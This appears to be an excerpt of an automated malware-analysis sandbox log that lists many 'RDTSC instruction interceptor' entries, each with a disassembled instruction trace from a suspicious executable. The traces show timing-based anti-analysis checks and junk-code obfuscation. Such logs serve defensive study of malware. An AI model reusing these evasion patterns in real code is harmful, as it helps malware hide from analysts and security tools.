                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3A62 second address: 13F3A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C33h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3A79 second address: 13F3A7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3A7D second address: 13F3A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jnp 00007F11F8F18C26h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3A8F second address: 13F3AAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51846h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F30B7 second address: 13F30CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F11F8F18C2Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F30CC second address: 13F30DA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F11F8D51836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4F75 second address: 13F4F79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F55D5 second address: 13F55ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D5183Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F11F8D51836h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F55ED second address: 13F5641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], ebx 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F11F8F18C28h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 clc 0x00000028 nop 0x00000029 push ecx 0x0000002a jp 00007F11F8F18C28h 0x00000030 pushad 0x00000031 popad 0x00000032 pop ecx 0x00000033 push eax 0x00000034 pushad 0x00000035 jl 00007F11F8F18C2Ch 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5710 second address: 13F5714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5714 second address: 13F571A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5810 second address: 13F582B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F11F8D5183Fh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F582B second address: 13F5831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F6C10 second address: 13F6C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F83D0 second address: 13F83EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F8F7F second address: 13F8F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F83EC second address: 13F83F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F91AA second address: 13F922A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push esi 0x00000009 call 00007F11F8D51838h 0x0000000e pop esi 0x0000000f mov dword ptr [esp+04h], esi 0x00000013 add dword ptr [esp+04h], 00000014h 0x0000001b inc esi 0x0000001c push esi 0x0000001d ret 0x0000001e pop esi 0x0000001f ret 0x00000020 jmp 00007F11F8D5183Bh 0x00000025 cld 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007F11F8D51838h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 jns 00007F11F8D51847h 0x00000048 push 00000000h 0x0000004a push edx 0x0000004b mov si, cx 0x0000004e pop edi 0x0000004f xchg eax, ebx 0x00000050 pushad 0x00000051 ja 00007F11F8D51838h 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a pop eax 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F8F83 second address: 13F8F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F922A second address: 13F922E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F8F87 second address: 13F8F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F9CA7 second address: 13F9D27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F11F8D51838h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007F11F8D51838h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ebp 0x00000043 call 00007F11F8D51838h 0x00000048 pop ebp 0x00000049 mov dword ptr [esp+04h], ebp 0x0000004d add dword ptr [esp+04h], 0000001Bh 0x00000055 inc ebp 0x00000056 push ebp 0x00000057 ret 0x00000058 pop ebp 0x00000059 ret 0x0000005a mov dword ptr [ebp+1246720Eh], ebx 0x00000060 push eax 0x00000061 push esi 0x00000062 push eax 0x00000063 push edx 0x00000064 push ebx 0x00000065 pop ebx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB97C second address: 13FB980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB980 second address: 13FB999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a jmp 00007F11F8D5183Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB999 second address: 13FB99D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FA5F1 second address: 13FA5FB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F11F8D51836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC939 second address: 13FC955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C37h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FD1E9 second address: 13FD21D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51844h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F11F8D51844h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401F81 second address: 1401F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401F85 second address: 1401F92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401F92 second address: 1401F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403DF6 second address: 1403E0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F11F8D51836h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401F97 second address: 1402036 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F11F8F18C28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d add ebx, dword ptr [ebp+122D3918h] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F11F8F18C28h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 jmp 00007F11F8F18C32h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 cmc 0x00000041 mov eax, dword ptr [ebp+122D10BDh] 0x00000047 mov dword ptr [ebp+12456AF6h], edi 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push eax 0x00000052 call 00007F11F8F18C28h 0x00000057 pop eax 0x00000058 mov dword ptr [esp+04h], eax 0x0000005c add dword ptr [esp+04h], 00000018h 0x00000064 inc eax 0x00000065 push eax 0x00000066 ret 0x00000067 pop eax 0x00000068 ret 0x00000069 jmp 00007F11F8F18C35h 0x0000006e nop 0x0000006f pushad 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403E0A second address: 1403E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1402036 second address: 140205B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C38h 0x00000009 popad 0x0000000a jng 00007F11F8F18C2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1403E0E second address: 1403E7B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F11F8D51836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F11F8D51838h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2F75h], ecx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F11F8D51838h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 push 00000000h 0x0000004a mov ebx, dword ptr [ebp+122D198Fh] 0x00000050 mov dword ptr [ebp+1246719Bh], esi 0x00000056 push eax 0x00000057 jng 00007F11F8D51842h 0x0000005d jp 00007F11F8D5183Ch 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1405EA4 second address: 1405EAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1404F36 second address: 1404F4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D5183Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1405EAA second address: 1405EAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1404F4C second address: 1404F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1404F53 second address: 1404F6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11F8F18C38h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1406CBD second address: 1406CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51847h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1406CD8 second address: 1406D01 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F11F8F18C2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F11F8F18C34h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1406D01 second address: 1406D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F11F8D51846h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1406D1E second address: 1406D80 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F11F8F18C28h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 sbb ebx, 1AB2B55Fh 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007F11F8F18C28h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 push 00000000h 0x00000046 mov edi, dword ptr [ebp+122D3920h] 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jl 00007F11F8F18C28h 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1407CF4 second address: 1407CFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1406EDB second address: 1406EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1407EFC second address: 1407F78 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a xor bx, 7F37h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov di, 6AA4h 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 mov dword ptr [ebp+122D1ABDh], ebx 0x00000027 mov eax, dword ptr [ebp+122D0F05h] 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F11F8D51838h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 push FFFFFFFFh 0x00000049 push 00000000h 0x0000004b push esi 0x0000004c call 00007F11F8D51838h 0x00000051 pop esi 0x00000052 mov dword ptr [esp+04h], esi 0x00000056 add dword ptr [esp+04h], 00000015h 0x0000005e inc esi 0x0000005f push esi 0x00000060 ret 0x00000061 pop esi 0x00000062 ret 0x00000063 mov ebx, dword ptr [ebp+122D2662h] 0x00000069 add edi, dword ptr [ebp+122D3778h] 0x0000006f push eax 0x00000070 pushad 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1407F78 second address: 1407F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140ADCE second address: 140ADD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140ADD2 second address: 140ADD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140ADD6 second address: 140ADDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1408F0F second address: 1408F19 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F11F8F18C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140ADDC second address: 140ADE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1408F19 second address: 1408F46 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F11F8F18C3Eh 0x00000008 jmp 00007F11F8F18C38h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jp 00007F11F8F18C40h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140BFAA second address: 140BFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140BFB0 second address: 140BFB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140BFB5 second address: 140BFD0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F11F8D5183Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F11F8D51838h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140D0AD second address: 140D113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F11F8F18C28h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov bh, dl 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+122D1ABDh] 0x00000030 xchg eax, esi 0x00000031 push eax 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 jmp 00007F11F8F18C38h 0x0000003a popad 0x0000003b pop eax 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F11F8F18C32h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140EFB7 second address: 140EFCD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F11F8D5183Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140FF4D second address: 140FF51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140C153 second address: 140C15D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F11F8D5183Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1410007 second address: 1410010 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1410010 second address: 1410021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a js 00007F11F8D51836h 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140C15D second address: 140C1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F11F8F18C28h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 call 00007F11F8F18C39h 0x00000028 mov ebx, dword ptr [ebp+122D1A6Ch] 0x0000002e pop ebx 0x0000002f push dword ptr fs:[00000000h] 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d cld 0x0000003e mov eax, dword ptr [ebp+122D0D21h] 0x00000044 push edx 0x00000045 mov ebx, 42EDFB32h 0x0000004a pop edi 0x0000004b push FFFFFFFFh 0x0000004d mov bx, 2784h 0x00000051 mov bh, A3h 0x00000053 nop 0x00000054 jmp 00007F11F8F18C32h 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d push ebx 0x0000005e pop ebx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140B076 second address: 140B07B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1410184 second address: 1410189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140F1A0 second address: 140F1B1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F11F8D51836h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BE9F3 second address: 13BE9F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1410189 second address: 1410231 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F11F8D51840h 0x00000008 jmp 00007F11F8D5183Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F11F8D51838h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push dword ptr fs:[00000000h] 0x00000031 jc 00007F11F8D51840h 0x00000037 jmp 00007F11F8D5183Ah 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 jne 00007F11F8D5183Ch 0x00000049 sub di, EFD1h 0x0000004e mov eax, dword ptr [ebp+122D0D45h] 0x00000054 jmp 00007F11F8D51842h 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push edi 0x0000005e call 00007F11F8D51838h 0x00000063 pop edi 0x00000064 mov dword ptr [esp+04h], edi 0x00000068 add dword ptr [esp+04h], 00000019h 0x00000070 inc edi 0x00000071 push edi 0x00000072 ret 0x00000073 pop edi 0x00000074 ret 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b popad 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140F1B1 second address: 140F1B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
